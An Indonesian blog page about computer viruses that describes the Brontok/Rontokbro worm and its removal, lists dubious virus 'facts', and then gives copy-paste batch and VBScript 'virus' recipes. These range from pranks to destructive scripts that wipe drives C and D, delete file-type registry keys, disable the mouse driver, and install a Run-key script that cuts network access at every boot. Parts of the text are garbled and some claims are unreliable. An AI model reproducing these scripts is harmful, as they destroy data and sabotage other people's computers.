virus komputer 2

Tampilkan postingan dengan label virus komputer 2. Tampilkan semua postingan
Tampilkan postingan dengan label virus komputer 2. Tampilkan semua postingan

virus komputer 2














































halaman 2



  ·C:\Windows dengan nama file eksplorasi.exe (hidden) 
  C:\Windows\shellnew dengan nama sempalong.exe (hidden)   C:\WINDOWS\system32 dengan nama %username"s Setting.scr  (hidden) 
  C:\Documents and Settings\%user%\Local Settings\Application Data 
dengan nama file 
- Bron.tok-x-y, dimana x dan y menurunkan 
- Loc.Mail.Bron.Tok, berisi alamat email yang diperoleh dari komputer yang terinfeksi 
- Ok-SendMail-Bron-tok, berisi email yang berhasil dikirim  - csrss.exe - inetinfo.exe - Kosong.Bron.Tok.txt 
- lsass.exe - NetMailTmp.bin - services.exe 
- smss.exe - Update.3.Bron.Tok.bin - winlogon.exe 
  C:\Documents and Settings\bagle\Start Menu\Programs\Startup nama  file - Empty 
C:\Documents and settings\%Users%\Templates 
- Brengkolang.com 
memicu  file pada setiap folder dimana file ini memiliki  nama yang sama dengan folder itu  dengan ciri-ciri 
  Icon yang dipakai  berupa Folder   Ukuran file 42 Kb 
  Ekstension .EXE 
Rontokbro juga akan melakukan perubahan pada file C:\AUTOEXEC.BAT 
dengan menambah nambah    baris perintah  PAUSE”. 
Agar Rontokbro dapat aktif begitu komputer dinyalakan, ia akan memicu  registry  beberapa registry key yaitu: 
  Bron-Spizaetus 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersi
on\Run 
  Tok-Cirrhatus
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 
  Shell dengan value Explorer.exe C:\Windows\Eksplorasi.exe 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon 
Disable Registry editor seperti kebanyakan virus yang ada, virus ini juga akan  menonaktifkan program yang dimungkinkan dapat mempersingkat keberadaan 
“mereka diantaranya fungsi registry editor dengan menambah nambah    sebuah registry  key: 
  DisableRegistryTools =1 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 
Jika fungsi registry editor dijalankan maka akan muncul pesan error: 
  Disable CMD 
Pada registry 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 
Selain menambah nambah    string pada registry key, virus in juga akan menambah nambah    
option di menu [startup] pada msconfig. 
- Sempalong - Smss - Empty 
 virus ini  menghilangkan [folder options] pada menu [tools] pada [Windows explorer], sehingga user tidak akan bisa menambah nambah  pilkan setiap file yang disembunyikan (hidden) oleh virus itu , dengan menambah nambah    string value : 
  NoFolderOptions"=dword:00000001 
pada registry key 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Pol
icies\Explorer 
Rontonbro juga akan memicu  task schedule pada windows dimana schedule ini .akan dijalankan setiap jam 5.08 PM, dengan menjalankan file yang berada 
didirektori: 
  C:\Documents and Settings\%Users%\Templates 
Restart Komputer Otomatis salah satu kelebihan yang dimiliki oleh Rontokbro .adalah dapat memicu  komputer restart, jangan harap up-date patch dapat 
menyelesaikan masalah ini, ini  disebabkan sebab  Rontokbro tidak .mengeksploitasi celah keamanan seperti yang biasa dipakai  oleh virus Sasser atau 
Blaster. .Rontokbro akan merestart komputer jika anda berusaha menjalankan suatu  program tertentu seperti regedit, msconfig   jika anda menjalankan software 
pengganti Task manager seperti pocket Killbox   HijackThis dan salah satu  kelebihan lain yang dimiliki adalah kemampuannya untuk merestart komputer 
walaupun dalam mode safe mode walapun, oleh sebab  itu diperlukan  trik untuk .menangani masalah itu . kemungkinan besar pembuat Rontokbro selalu 
mengikuti saran dan perkembangan terakhir sehingga ia akan makin sulit dibasmi .sebab  selalu mengupdate dirinya. .Rontokbro akan mengambil alamat email pada semua file yang mengandung .ext. 
  .asp   .cfm   .csv   .doc   .eml   .html   .php   .txt   .wab 
Selain menyebar melaui email, Rontokbro juga akan menyebar melalui  Disket/USB dengan memicu  file pada folder/subfolder yang ada didisket/USB atau 
pada root USB itu sendiri, file yang diciptakan itu  memiliki   ciri-ciri:    Icon mirip  Folder 
  Ukuran 42 Kb   Ext. EXE 
Rontokbro juga akan mencoba untuk melakukan koneksi dengan mengirimkan  ping request ke salah satu situs dewasa seperti kaskus.com dan 17tahun.com, ini  .lah salah satu faktor yang dapat dapat memperlambat system komputer tetapi sebab  
penyebaran koneksi internet di Indonesia relatif masih lambat, dampak dari ini   akan kurang terasa pada user dialup rumahan sebab  tidak selalu terkoneksi dan 
dampak terbesar akses ke dua situs itu  akan besar pengaruhnya jika komputer .yang terkena Ronrokbro adalah komputer rumahan yang memiliki koneksi ADSL dan selalu terkoneksi ke internet, komputer Warnet atau kantor yang selalu terkoneksi ke internet. 
Seperti layaknya antivirus, Rontokbro juga mencoba untuk melakukan up-date .ke salah satu situs yang sudah ditentukan, jadi jangan lengah sebaiknya up-date  antivirus Anda agar tidak menjadi korban berikutnya dan jangan lupa agar tidak .sembarangan dalam bertukar data melalui disket/usb satu tips yang mungkin berguna  adalah dengan mengenali jenis file yang akan dijalankan, dan usaha kan untuk selalu 
menambah nambah  pilkan ekstesi dari file itu  agar dapat mengetahui type dari file itu . Satu cara yang efektif untuk mencegah Rontokbro adalah dengan memakai  
antivirus yang memberi  support lokal sehingga definisinya dapat mengimbangi  munculnya varian baru Rontokbro yang sampai saat ini masih terus dikeluarkan.  Cara membersihkan Rontokbro 
1. Lakukan pembersihan melalui safe mode 
2. Matikan proses virus .Untuk mematikan proses itu  sebaiknya jangan memakai  program  pocket killbox atau HijackThis sebab  komputer akan langsung restart jika anda  menjalan kan tools ini, kami sarankan untuk memakai  tools lain yang seperti  PROCEXP.EXE dapat didownload di situs  http://www.sysinternals.com/Utilities/ProcessExplorer.html Hapus proses dengan cara "klik kanan nama proses" dan pilih "kill prosess 
tree", agar tidak salah dalam penghapusan cari proses yang memiliki  icon "folder", .seperti: 
  smss.exe   services.exe  winlogon.exe 
Atau dapat melakukan tahap antaralain : 
a. Restart komputer dan masuk dalam mode "safe mode with command  prompt”, dengan cara menekan tombol [F8] saat  komputer restart, ini   dimaksudkan agar virus Rontokbro tidak aktif pada posisi ”safe mode dan 
komputer tidak melakukan restart selama proses pembersihan. 
b. Sesudah  masuk mode ”Command Prompt tekan tombol [CTRL]+[ALT] 
+[Del] secara bersamaan, kemudian pilih [Task Manager], sesudah  layar Task .Manager muncul, klik menu [File] pilih [New Task (Run..), kemudian ketik 
[explorer] pada jendela [create new task file] sesudah  itu klik enter. 
c. Kemudian akan muncul layar desktop (layaknya masuk ke mode "safe mode") 
d. Aktifkan kembali fungsi registry editor dan hapus string yang dibuat oleh  virus, tulis script seperti yang ada pada angka [3], kemudian simpan menjadi 
nama file "repair.inf", sesudah  itu jalankan file itu  dengan cara: klik  kanan file [repair.inf] kemudiani pilih [install] 
e. Hapus option [Smss], [Empty] dan [Sempalong] pada msconfig ditabulasi  [startup) 
f. Agar ”Folder option pada windows explorer dapat muncul, restart kembali  komputer dan lakukan seperti langkah pada point (a dan b) 
g. Sesudah  komputer masuk ke mode "safe mode" tampilkan semua file yang  disembuyikan (lakukan perubahan ini pada "folder option", lihat gambar yang 
ada pada point [5], selanjunya ikuti petunjuk pembersihan Rontokbro seperti  yang ada pada point (6-9) 
3.Tulis script berikut dan simpan di notepade beri nama file repair.inf, jalankan file  itu  (klik kanan [repair.inf] pilih [install]), ini  dimaksudkan untuk mengaktifkan kembali fungsi registry editor, menambah nambah  pilkan kembali [folder option]  dan  menghapus semua  string yang sudah  dibuat oleh virus[Version] 
Signature="$Chicago$" 
Provider=Vaksincom 
[DefaultInstall] 
AddReg=UnhookRegKey 
DelReg=del 
[UnhookRegKey] 
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*" 
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*" 
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*" 
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*" 
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1"" 
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*" 
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, 
"Explorer.exe" 
[del] 
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistr
yTools 
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD 
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOpt
ions 
HKCU, Software\Microsoft\Windows\CurrentVersion\Run,Tok-Cirrhatus 
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Bron-Spizaetus
4. Restart komputer dan masuk kembali ke mode "safe mode" jangan keposiosi "normal" sebab  file induk dari virus ini masih ada (eksplorasi.exe dan .sempalong.exe) 
5. Tampilkan file yang disembunyikan, lakukan perubahan ini pada [folder Option] 
6. Hapus file yang dibuat oleh Rontokbro 
- C:\Windows dengan, nama file eksplorasi.exe (hidden) 
- C:\windows\shellnew, dengan nama sempalong.exe(hidden) 
- C:\WINDOWS\system32, dengan nama %username"s Setting.scr (hidden) 
- C:\Windows\pss, dengan nama file [Empty.pifStartup]
- C:\Documents and Settings\%user%\Local Settings\Application Data dengan 
nama file 
- Bron.tok-[x]-[y], di mana [X] dan [Y] menunjukan angka  - Loc.Mail.Bron.Tok  - Ok-SendMail-Bron-tok 
- csrss.exe - inetinfo.exe - Kosong.Bron.Tok.txt 
- lsass.exe - NetMailTmp.bin - services.exe 
- smss.exe - Update.3.Bron.Tok.bin - winlogon.exe 
- smss.exe 
7. Edit kembali file autoexec.bat di direktori C:\ dan hapus baris perintah [pause]
8. Hapus scheduled tasks yang dibuat oleh Rontokbro (klik [Start],[Settings], [Control Panel], kemudian klik 2 kali menu [scheduled tasks]. 
9. Hapus file yang dibuat oleh virus, untuk lebih cepatnya pakai  fasilitas [serach]   Klik [Start] 
  Klik [Search], kemudian klik [For Files or Folders]
  Kemudian pilih [All files or Folders] 
  Klik option [What size is it ?] 
  Kemudian pilih option [Specify Size (in Kb)] 
  Pada kombo Box, pilih [At most] kemdian isi ukuran file dengan angka [43], .sesudah  itu klik [Search] 
Sesudah  proses pencarian selesai, sortir berdasar  ukuran (size), kemudian hapus  file yang memiliki  ukuran 42 kb, jangan sampai terjadi kesalahan dalam 
penghapusan file sebab  ada beberapa file windows yang memiliki  ukuran 42 kb,  cari file yang icon folder dengan extension. EXE. 
10. Untuk pembersihan lebih cepat sebaiknya  pakai  antivirus yang sudah dapat mengenali Rontokbro.N jangan lupa update antivirus yang terinstall, sebagai 
informasi antivirus Norman dengan up-date terakhir sudah dapat menganali virus ini dengan baik. 
Tips berikut ada beberapa tips dan trik yang dapat dipakai  terhindar dari serangan virus lokal 
 Jangan sembarangan dalam melakukan pertukaran data melalui disket/usb ,Patikan disket/Usb bersih dari virus dengan melakukan scan  pada  disket/usb sebelum dipakai . ,Kenali jensi file yang akan dijalankan
 Biasakan untuk menambah nambah  pilkan extensi file, ini  dimaksudkan untuk mengetahui jenis file sebelum dijalankan. 
virus   dapat merusak perangkat lunak komputer dan  dapat merusak perangkat keras komputer  dapat memicu  kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus  adalah memperbanyak dirinya sendiri, yang memicu  sumber daya pada komputer (seperti pemakaian  memori) menjadi berkurang  Hampir 99% virus  berbasis sistem operasi Windows. virus  menggambarkan segala jenis serangan  pada  komputer. digolongkan  ke dalam kategori 
 Worm - mengganda  dirinya sendiri pada hard disk. Ini memicu  sumber  hard disk menjadi penuh akan worm itu. Trojan - Mengambil data pada komputer yang sudah  terinfeksi dan mengirimkannya pada pembuat trojan itu sendiri. Backdoor - Hampir sama dengan trojan. Namun, Backdoor  mirip  file yang baik-baik saja. contohnya  game. Spyware - Virus yang memantau komputer yang terinfeksi. Rogue - yaitu  program yang meniru program antivirus dan menambah nambah  pilkan 
aktivitas layaknya antivirus normal, dan memberi  peringatan palsu tentang adanya virus. agar pemakai  membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue itu . Juga rogue dapat membuka celah keamanan dalam 
komputer guna mendatangkan virus lain Rootkit - Virus yang bekerja mirip  kerja sistem komputer yang biasa saja. Polymorphic virus - Virus yang gemar berubah-ubah agar tidak dapat terdeteksi. Metamorphic virus - Virus yang mengubah pengkodeannya sendiri agar lebih 
sulit dideteksi.Akibat yang ditimbulkan oleh virus adalah  Banyak aplikasi yang error Sistem komputer jadi pelan atau lambat Sistem komputer tidak bisa dibuka Data disembunyikan virus, semua Data dan file terhapus  rusak permanen,
Fakta tentang virus ada 10  :
virus  pertama dinamakan  Virus Creeper. Hal itu terdeteksi di ARPANET, pendahulu dari apa yang kita sebut hari ini, internet pada awal tahun 1970. Ini 
adalah program replikasi diri ditulis sebagai percobaan oleh Bob Thomas di BBN Technologies pada 1971. 
 MyDoom (juga dikenal sebagai W32.MyDoom@mm) adalah worm komputer  menyebar tercepat yang pernah dibuat. Ini pertama kali terlihat pada tahun 2004, 
dan itu menyebar begitu cepat, catatan dari yang belum melampaui pada 2017. Kembali pada tahun 2004, diperkirakan akan berdampak hampir 25% dari semua email yang dikirim. ini  memicu  kerusakan komputer,
Penulis virus yang khas adalah pelajar bahasa  pemprograman , antara 14 sampai 35 tahun. penulis virus kebanyakan anak-anak dan siswa yang ingin berpercobaan  dan mengasah keterampilan program mereka. Programmer virus, yang dikenal sebagai 
penulis virus, sengaja menulis program virus. 
 Sekitar 90% dari hacker profesional dan penulis virus bekerja di bawah kontrak organisasi pemerintah  besar. Pekerjaan utama mereka adalah untuk mencari celah, masalah keamanan dan menembus ke jaringan perusahaan. Ini celah dan kelemahan keamanan kemudian ditetapkan oleh programmer lain untuk lebih mengamankan sistem mereka. 
Menurut  Microsoft keamanan  Intelligence, Panda keamanan  dan Consumer Reports, sekitar 90% komputer dunia diselipkan  beberapa bentuk virus atau trojan permanen  tidak berbahaya di dalam komputer mereka. Sekarang itulah yang kita dinamakan   virus yang sebetulnya ,
sekitar 240 juta rumah tangga mengalami loading  berat, dan lebih dari 160  juta rumah tangga dunia  memiliki  masalah  loading  yang serius  10 tahun terakhir. Internasional, Amerika Serikat diserang oleh jutaan worm  komputer dan virus  tersembunyi yang tidak berbahaya , diikuti oleh negara negara miskin dunia,, menulis  belajar membuat virus  tidak dianggap sebagai tindakan ilegal di dunia . Beberapa negara lain memiliki undangundang kejahatan cyber jauh lebih lemah  dibandingkan  AS. contohnya , jepang  tindakan menulis virus  tidak  ilegal, sementara pertukaran massal  virus untuk tujuan apapun dibatasi didunia,  Microsoft Research mengungkapkan bahwa sekitar 1 dari setiap 140  program  download   memiliki beberapa elemen   virus canggih berbahaya  yang  tidak hilang melekat padanya. Meskipun semua web browser sekarang  yang  modern memiliki metode gratis   untuk  membasmi  ribuan jenis virus spam  dan mengarahkan pemakai akan adanya  konten berbahaya, hampir 2% saja yang berhasil mendeteksi virus spam berbahaya,
 sebab  meningkatnya  ketidak amanan  semua media termasuk  komputer,  hacker sudah  menemukan  lebih banyak  pengalaman  dalam melihat kelemahan sasaran Ini dinamakan  Social Engineering. pemakai  
memperoleh  kabar  ini dari beberapa  link di  Facebook, seseorang hacker  mengarahkan mereka untuk men-download beberapa aplikasi , yang pada gilirannya adalah berbahaya.  modus utama dari virus menyebar adalah Internet,removable media, CD, DVD ,disket. Sekitar 60 aplikasi pembuat  virus dibuat dan menyebar ke alam liar , sekali lagi, antivirus dan keamanan perusahaan sangat kerepotan membasmi aplikasi pembuat  virus dan   terus-menerus waspada dan memperbarui database mereka
virus Aksika Virus open source yang satu itu  memiliki 
banyak  varian. sebab  source code-nya memang disediakan bebas di Internet, jadi siapapun dapat dengan mudah mengubah dan meng-compile source 
code-nya dan jadilah varian baru.Berawal dari kemudahan itulah, banyak  programer pemula mencoba coba untuk memicu  virus tanpa perlu repot. Paling yang diperlukan  hanyalah pengetahuan seputar operating system dan programming. Namun kemudahan itu belum seberapa, bila dibandingkan dengan memakai  program Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari 
program itu . Ya, Virus Generator yaitu  program untuk  memicu  virus secara mudah dan instan. Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan  PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada juga yang menyebutnya dengan nama Brontok.D. Dengan 
penyelidikan sederhana akhirnya diketahui bahwa virus itu  dibuat memakai  Virus Generator.Fast Firus Engine Pembuat Generator itu  menambah nambah   program buatannya itu dengan nama Fast Firus Engine. program ini hanya untuk tujuan pembelajaran dan tidak untuk 
tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan dipakai  untuk pengrusakan. Virus Generator ini dibuat memakai  bahasa Visual Basic dan di-compress memakai  packer tELock. Dalam paketnya ada  dua buah file, yaitu  Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe yaitu  program utama dalam pembuatan virusnya dan sementara file data.ex_  yaitu  badan virus asli yang belum direkayasa . Saat file Fast Firus Engine.exe dijalankan, maka pemakai  akan dihadapkan pada 
sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda. Cara kerja dari Generator itu   sangat sederhana. Ia hanya menambah nambah    data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi itu  dipakai  oleh virus dalam proses infeksi.
Virus hasil ciptaan FFE  terlihat sederhana. Sama seperti Generatornya, ia juga dibuat memakai  bahasa Visual Basic yang di-compile dengan metode NativeCode. Lalu di compress memakai  tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes. Saat virus kali pertama dieksekusi, ia akan memicu  beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan ada  file dengan nama.exe, Win32  exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan ada  file 
copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau memicu  file  Oeminfo.ini yang yaitu  bagian dari System Properties. Jadi jika  komputer 
Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan  ada  tulisan Generated by Fast Firus Engine .  Di direktori \%WINDOWS%\%System%\ akan ada  beberapa file induk lagi yang  memakai  nama yang sama seperti file system milik Windows, seperti csrss.exe, 
winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe. .Dan tak lupa, pada root drive pun akan ada  file dengan nama baca euy.txt yang berisikan pesan pesan dari si pembuat virus. Jadi pada saat memicu  virus dengan  memakai  Generator itu , maka pembuatnya akan disuguhkan beberapa kotak 
input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak  messages ini yang nantinya ditampilkan pada file baca euy.txt itu . 
Sesudah  virus berhasil meng-copy-kan file induknya ke dalam sistem itu , ia akan  menjalankan file induk tadi, sehingga pada memory akan ada  beberapa process 
virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, danwinlogon.exe. Nama process yang mirip dengan process/services milik Windows 
itu  mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process itu  dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya 
berasal dari direktori System32.MengubahRegistry
Virus ini menambah nambah    beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubah ubah nya tidak akan 
dapat dengan mudah kita lihat sebab  dalam kondisi terenkripsi. Yang ia ubah adalah seperti nilai dari item Userinit, yaitu  dengan menambah nambah    parameter ke file induk. Pada key HKEY_CURRENT_ 
USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan 
diubah ubah  itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada  HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan  ada  item baru dengan nama present. Key HKEY_ 
LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan  ada  item baru juga dengan nama Default dan %username%, username di sini  yaitu  nama user yang sedang aktif saat itu. 
Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yaitu   dengan mengubah type information dari Application menjadi File Folder. Setting-an  folder Options juga diubah ubah  agar tidak menambah nambah  pilkan extension dan setiap fi le dengan 
attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot. 
Dengan memakai  bantuan registry Image File Execution Options, virus ini juga menambah nambah    item baru pada section itu  dengan nama cmd.exe, msconfi g.exe, 
regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkanke file induk si virus Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk itu  akan ada  beberapa file baru, seperti explorer.exe, %virusname%.exe, dan 
msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk itu . File virus lainnya pun disimpan pada direktori baru di flash disk itu  dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus itu  dalam kondisi hidden sehingga tidak terlihat.Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap 
program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah ubah , data mengenai program apa saja yang diblok olehnya juga ada  dalam tubuhnya dalam kondisi terenkripsi. Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yaitu  dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, 
ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan  pada komputer terinfeksi.

memicu  program/aplikasi yang  berexstensi .exe tidak mau jalan
  Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan
mengetik key windows + R lalu ketik cmd dan dan tekan enter lalu saat n script berikut di 
cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter nah, ini memicu  program/aplikasi
yang berexstensi .exe tidak mau jalan
  Tapi tenang, ini bisa dikembalikan seperti semula dengan cara buka cmd nya lagi lalu ketik
"ASSOC.exe=EXEFILE

memicu  komputer menjadi eror
  Sekarang saya akan menjelaskan cara memicu  virus memakai  Notepad : Buka notepad nya
melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke
notepad : 
  ------
  Start 
  Start 
  ------
  lalu  simpan di notepad dengan nama apa saja dengan exstensi .bat contoh : "eror.bat" 
tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini memicu  komputer menjadi
eror, sebab  akan membuka CMD yang banyak jika file "eror.bat" itu di buka.

virus untuk memicu  beberapa folder secara otomatis
  Dengan menjalankan virus ini maka secara otomatis akan memicu  sebuah folder secara
otomatis. Caranya seperti biasa simpan kode dibawah ini kedalam file multifol.bat.
  @echo off :RON md folder1 md folder2 md folder3 md folder4 md folder5 start folder1 start 
folder2 start folder3 start folder4 
  start folder5 goto RON

memicu  notepad terbuka secara otomatis
  silahkan ketik/ copas kode script berikut ke notepad :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
  Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti yang tadi, contoh
"eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan memicu 
notepad terbuka dengan sendirinya secara otomatis.


memicu  tombol backspace menjadi eror menekan terus menerus secara otomatis
  tiru ketik kode script berikut ke notepad : 
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
  Simpan kode script itu  di notepad dengan nama apa saja yang penting tidak lupa menuliskan
exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini
memicu  tombol backspace menjadi eror dan menekan dengan sendiri nya.

virus untuk enter tak berujung
Set wshShell = wscript.CreateObject(”WScript.Shell”) do
wscript.sleep 100
wshshell.sendkeys  (enter)”
loop
  Caranya seperti biasa dari notepad lalu simpan kedalam file endenter.bat.

memicu  cd/dvd room buka tutup dengan sendiri nya
  langsung aja tiru ketik kode script berikut ke notepad :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan kode itu  di notepad dengan nama bebas dan tam  exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadiAll 
Files, maka akan bisa memicu  CD/DVD Room buka tutup dengan sendirinya secara otomatis.

caps lock menyala terus menerus tak terkendali, 
  langsung saja tiru ketik kode script berikut di notepad
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
  Simpan kode script itu  dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" 
dan Save As Type ganti menjadi All Files, maka jika File ini di buka akan memicu  Caps Lock 
menyala terus menerus.

virus memicu  caps lock menari
Set wshShell =wscript.CreateObject(“WScript.Shell”) do
wscript.sleep 100
wshshell.sendkeys {CAPSLOCK} wshshell.sendkeys {NUMLOCK}”
loop
  Sekarang simpan sebagai file dancecap.bat.

komputer menjadi shoutdown
  copas ke notepad : 
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
  Simpan kode script itu  dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" 
dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan memicu  komputer
shoutdown atau mati.

komputer menjadi shoutdown
  langsung saja tiru ketik kode script berikut ke notepad : 
@echo shutdown -s  t 1  f 
  Simpan kode script itu  dengan nama bebas dan dengan exstensi .bat lain dengan trik yang 
no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jika file 
ini dibuka akan sama dengan no 7 yaitu memicu  komputer Shoutdown, hanya saja yang 
membedakan adalah yang ini berisi waktu, lihat angka pada kode script itu  yang berwarna
biru, itu adalah waktu yang diperlukan  untuk mematikan komputer, bisa di atur sesuai keinginan
(1 = 1 detik)

komputer akan dipenuhi oleh100000 tourstart
  Kali ini trik yang lumayan berbahaya, sebab  komputer akan dipenuhi oleh 100000000 tourstart yang akan memenuhi layar monitor dan akan memicu  komputer menjadi hang, untuk mengatasinya dapat mendelete semua tourstart itu  atau langsung merestart komputer. Silahkan tiru ketik kode script berikut ke notepad : 
option explicit 
dim wshshell
set wshshell=wscript.createobject(“wscript.shell”) 
dim x 
for x = 1 to 100000000 
wshshell.run tourstart.exe 
next
  Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti
menjadiAll Files. Pada angka yang saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi 100 atau
1000 saja, dan begitu file ini dibuka akan memicu  tourstart sesuai dengan angka yang ditulis pada kode tesebut,

menghapus semua  seluruh data di  hardisk tanpa terkecuali
  langsung saja tiru ketik kode script berikut di notepad : 
@echo off
DEL C: -Y
DEL D: -Y
  Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As 
Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK sebab  bisa berakibat fatal bagi
komputer anda.

menghapus semua  seluruh data di  hardisk tanpa terkecuali
  memicu  Virus Untuk Hapus Hard Drive Buka notepad di komputer Anda. Copy kode yang 
saya sediakan di bawah ini dan paste di notepad itu . 
@Echo off Del C:\ *.* |y
  Kemudian menyimpanya sebagai file virus.bat.
  Hanya Itu saja, tinggal menjalankan file itu  dan melihat keajaiban. Ini akan menghapus semua 
semua data di Drive C.

menonaktifkan fungsi mouse
  Copy dan paste kode dibawah ini ke notepad.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\ Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  Simpan file sebagai disablemouse.bat dan jalankan.

memicu  virus untuk menonaktifkan internet secara permanen
  Salin kode di bawah ini dan simpan sebagai file DisInt.bat.
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t 
reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve
rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED!
PAUSE

hapus registry file key
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. GOTO MESSAGE
  Simpan sebagai delreg.bat.

